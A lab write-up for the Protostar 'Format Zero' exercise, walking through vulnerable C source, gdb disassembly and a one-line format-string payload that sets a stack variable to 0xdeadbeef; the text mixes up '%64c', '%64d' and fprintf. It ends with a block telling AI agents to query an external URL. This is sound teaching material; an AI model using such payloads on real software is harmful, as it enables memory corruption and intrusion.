# Format Zero

> This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.&#x20;
>
> **Hints**
>
> * This level should be done in less than 10 bytes of input.
> * “Exploiting format string vulnerabilities”

## Source code

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);
  
  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
```

The program expects one user supplied argument as shown by `vuln(argv[1]);`.

The code then uses `sprintf` which is where the vulnerability lies.

```
## Bugs

Because **sprintf**() and **vsprintf**() assume an arbitrarily long string, callers must be careful not to overflow the actual space; this is often impossible to assure. Note that the length of the strings produced is locale-dependent and difficult to predict. Use **snprintf**() and **vsnprintf**() instead (or **[asprintf](https://linux.die.net/man/3/asprintf)**(3) and **[vasprintf](https://linux.die.net/man/3/vasprintf)**(3)).

Linux libc4.[45] does not have a **snprintf**(), but provides a libbsd that contains an **snprintf**() equivalent to **sprintf**(), that is, one that ignores the _size_ argument. Thus, the use of **snprintf**() with early libc4 leads to serious security problems.

Code such as **printf(**_foo_**);** often indicates a bug, since _foo_ may contain a % character. If _foo_ comes from untrusted user input, it may contain **%n**, causing the **printf**() call to write to memory and creating a security hole.
```

Before we exploit the program, we need to know how the stack is laid out.

Let's disassemble the `vuln` function.

```
(gdb) disass vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   ebp
0x080483f5 <vuln+1>:    mov    ebp,esp
0x080483f7 <vuln+3>:    sub    esp,0x68
0x080483fa <vuln+6>:    mov    DWORD PTR [ebp-0xc],0x0
0x08048401 <vuln+13>:   mov    eax,DWORD PTR [ebp+0x8]
0x08048404 <vuln+16>:   mov    DWORD PTR [esp+0x4],eax
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef
0x0804841b <vuln+39>:   jne    0x8048429 <vuln+53>
0x0804841d <vuln+41>:   mov    DWORD PTR [esp],0x8048510
0x08048424 <vuln+48>:   call   0x8048330 <puts@plt>
0x08048429 <vuln+53>:   leave
0x0804842a <vuln+54>:   ret
```

We can see that the line at `vuln+26` makes the call to `sprintf`.

```
--snip--;
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
--snip--;
```

The first argument is the address `ebp-0x4c` and it is loaded into `eax`.

If we look at the man page of `sprintf` we can see that the first argument is a pointer to the buffer.

```c
int sprintf(char *restrict s, const char *restrict format, ...);
```

Looking back at the disassembled code of `vuln` at `vuln+34` a comparison is being made.

```
--snip--;

0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef

--snip--;
```

This is checking if the `target` variable is set to `0xdeadbeef`. The value being compared is being moved from `ebp-0xc`.

So we know the location of the `buffer` as well as the `target` variable. Let's find the distance between them.

```
(gdb) p/d 0x4c - 0xc
$1 = 64
```

So the distance is 64 bytes but we have been instructed to use less than 10 bytes. Which means a classic buffer overflow will not work.

This is where the [format string attack](https://owasp.org/www-community/attacks/Format_string_attack) comes in.

Instead of submitting 64 bytes of padding we can submit the format string `%64c` which translates to 64 characters.

When `fprintf` is executed, it takes the bytes after the format string and overwrites the `target` variable.

## Exploit

```
$ ./format0 $(python -c 'print "%64d\xef\xbe\xad\xde"')
you have hit the target correctly :)
```

Note that you can use other format specifiers mentioned [here](https://owasp.org/www-community/attacks/Format_string_attack).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kunalwalavalkar.gitbook.io/write-ups/exploit-education/protostar/format-zero.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
